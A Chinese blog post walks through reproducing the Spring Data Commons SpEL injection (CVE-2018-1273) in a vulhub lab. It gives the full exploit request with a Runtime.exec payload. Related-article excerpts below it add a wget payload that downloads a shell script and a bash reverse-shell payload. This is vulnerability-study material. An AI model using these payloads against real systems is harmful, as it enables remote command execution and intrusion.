Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)

最新推荐文章于 2024-03-12 10:31:05 发布
最新推荐文章于 2024-03-12 10:31:05 发布
阅读量328 收藏
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全 spring
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/119380172
版权

漏洞简介

Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。

漏洞复现

参考文章中的payload,在注册的时候抓包,并修改成如下数据包,即可运行命令:

POST /users?page=&size=5 HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 124
Pragma: no-cache
Cache-Control: no-cache
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:8080/users?page=0&size=5
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=

在这里插入图片描述
返回靶机查看:
在这里插入图片描述

小 白 萝 卜
关注
专栏目录
复现vulmap——CVE-2018-1273漏洞Spring Data Commons 远程命令执行
记录并分享学习安全的知识点..
01-16 888
一、漏洞介绍 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data CommonsSpring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。 二、影响版本 Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10) Spring Data REST 2.6 - 2.6.10 (I
[Java安全]Spring Data CommonsCVE-2018-1273
snowlyzz的博客
02-08 726
CVE-2018-1273漏洞分析
001--什么是SpringData
weixin_42288943的博客
04-17 191
1.参考网址:https://blog.csdn.net/zgf19930504/article/details/50537198 2.核心内容: ** Spring Data **是Spring 的一个子项目, 旨在统一和简化对各类型持久化存储, 而不拘泥于是关系型数据库还是NoSQL 数据存储。无论是哪种持久化存储, 数据访问对象(或称作为DAO,...
Spring Data Commons 远程命令执行漏洞
m0_63241485的博客
08-17 538
Spring是一个开源框架,它是为了解决企业应用开发的复杂性而创建的。Spring使用基本的JavaBean来完成以前只可能由EJB完成的事情。然而,Spring的用途不仅限于服务器端的开发。从简单性、可测试性和松耦合的角度而言,任何Java应用都可以从Spring中受益。Spring的开发初衷:1、JAVA EE开发应该更加简单。2、使用接口而不是使用类,是更好的编程习惯。Spring将使用接口的复杂度几乎降低到了零。3、为JavaBean提供了一个更好的应用配置框架。...
Spring Data Commons远程命令执行漏洞复现(CVE-2018-1273
wutiangui的博客
09-10 928
下载文件请求包:username[#this.getClass().forName(“java.lang.Runtime”).getRuntime().exec(“/usr/bin/wget -O /tmp/1.sh http://192.168.155.2:8081/shell.sh”)]&password=test&repeatedPassword=test。访问http://192.168.25.128:8080/users,注册,BP抓包。在sh文件所在目录开启http服务。2.开启http服务。
Spring Data Commons-远程命令执行漏洞CVE-2018-1273
qq_43381463的博客
04-19 481
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data CommonsSpring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令
漏洞复现之CVE-2018-1273 Spring Data Commons 远程命令执行
白帽子九一
04-27 1053
漏洞背景 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data CommonsSpring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。 实验环境 攻击机:Win 10 靶场:kali中搭建vulhub靶场 https://github.com/vulhub/vulhub/spring/CVE-2018-1273 影响版本 Sp
linux漏洞分析,Spring-data-commons(CVE-2018-1273)漏洞分析
weixin_39830303的博客
05-13 890
前言CVE-2018-1273Spring-data-commons近期爆出的一个可远程执行代码漏洞,为了了解更多细节,本文将从漏洞的成因,漏洞的判定以及漏洞的利用三个方面来进行详细说明。漏洞的成因当用户在项目中利用了Spring-data的相关web特性对用户的输入参数进行自动匹配的时候,会将用户提交的form表单的key值作为Spel的执行内容,而这一步就是本次漏洞的爆发点。漏洞的判定...
poc-cve-2018-1273:CVE-2018-1273的POC
05-15
CVE-2018-1273 Spring Data Commons(1.13至1.13.10之前的版本,2.0至2.0.5的版本以及较早的不受支持的版本)包含由于特殊元素的不正确中和导致的属性绑定器漏洞。 未经身份验证的远程恶意用户(或攻击者)可以针对...
漏洞复现—Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273
weixin_45556536的博客
12-24 1419
CVE-2017-4971 // 注意反弹的端口和IP修改,反弹语句需要url编码 &_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vulhub
CVE-2018-1270,CVE-2018-1273Spring Expression Language 漏洞分析
qq_22655689的博客
04-12 1477
0x00 背景     最近Spring框架不大太平,接连爆出来多个RCE远程代码执行CVE漏洞,其中有CVE-2018-1270,CVE-2018-1273,通过对造成漏洞部分代码进行分析,发现都是因为滥用SpEL的StandardEvaluationContext。   0x01 漏洞影响 攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞的服务器上,从而发起...
spring(CVE-2018-1273)远程代码执行漏洞复现
最新发布
勤劳的码农的博客
03-12 1万+
Spring DataSpring框架中提供底层数据访问的项目模块,Spring Data Commons 是一个共用的基础模块。此模块对特殊属性处理时会使用SpEl表达式,导致攻击者可以通过构造特殊的URL请求,造成服务端远程代码执行。在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令Spring在补丁中使用更加安全的SimpleEvaluationContext替换了StandardEvaluationContext。
Spring Data Commons远程命令执行漏洞_CVE-2018-1273(反序列Runtime方法)
weixin_42786460的博客
09-16 428
Spring Data Commons远程命令执行漏洞_CVE-2018-1273(反序列Runtime方法)
Spring Data Commons 远程命令执行漏洞 CVE-2018-1273 漏洞复现
ADummy的博客
03-02 296
Spring Data Commons 远程命令执行漏洞CVE-2018-1273) by ADummy 0x00利用路线 ​ burpuite抓包—>改包—>SpEL命令执行 0x01漏洞介绍 ​ Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data CommonsSpring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达
Spring Data Commons 远程命令执行漏洞CVE-2018-1273漏洞验证与getshell
qq_45300786的博客
08-02 1197
利用条件 影响版本 · Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10) · Spring Data REST 2.6 - 2.6.10 (Ingalls SR10) · Spring Data Commons 2.0 to 2.0.5 (Kay SR5) · Spring Data REST 3.0 - 3.0.5 (Kay SR5) 复现过程 vulhub 详细过程请看Spring Data Commons 远程命令执行漏洞CVE-2018-1273
Spring Data Commons项目介绍
实践求真知
09-08 8657
一 点睛 Spring Data Commons有一个重要概念:Spring Data Repository抽象。使用Spring Data Repository可以极大地减少数据访问层的代码。既然是数据访问操作的统一标准,那肯定是定义了各种各样和数据访问相关的接口,下面来看看Spring Data Repository抽象的根接口是怎样定义的。 二 关键源码解读 1 Repository接...
漏洞复现 | CVE-2018-1273 Spring Data Commons 远程命令执行
weixin_42282189的博客
09-15 2151
作者: 墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data CommonsSpring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。 受影响版本: Spring Data Commons 1.13 – 1.13.10 (Inga.
Spring Data Commons远程命令执行(CVE-2018-1273)
Lucky1youzi的博客
01-02 295
渗透
CVE-2016-4977) SpringSecurityOauth 远程命令执行
weixin_45253622的博客
12-10 1733
漏洞简介: Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块,其维护者发布了这样一个升级公告,主要说明在用户使用Whitelabel views来处理错误时,攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令Spring Security OAuth 支持使用标准 SpringSpring Security 编程模型和配置习惯用法与 OAuth (1a) 和 OAuth2 一起使用 Spring Security。在使用白标签视图进行错误处理时,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值